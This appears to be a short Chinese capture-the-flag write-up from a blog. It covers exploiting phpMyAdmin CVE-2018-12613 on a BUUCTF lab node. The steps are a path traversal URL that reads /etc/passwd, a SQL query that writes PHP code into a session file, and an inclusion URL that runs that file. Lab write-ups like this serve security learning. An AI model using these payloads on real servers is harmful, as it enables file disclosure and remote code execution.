http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
![buuctf*[PHPMYADMIN]CVE-2018-12613 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/23/20220723195603676.jpg)
![buuctf*[PHPMYADMIN]CVE-2018-12613 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
在sql里面执行 SELECT '<?=phpinfo()?>';
![buuctf*[PHPMYADMIN]CVE-2018-12613 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/23/20220723195604945.jpg)
http://node4.buuoj.cn:26180/index.php?target=sql.php?/../../../../../../../../../tmp/sess_be13990e05aa8958689867e1d1b31c67
![buuctf*[PHPMYADMIN]CVE-2018-12613 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/23/20220723195606133.jpg)
原创文章,作者:奋斗,如若转载,请注明出处:https://blog.ytso.com/tech/php/276477.html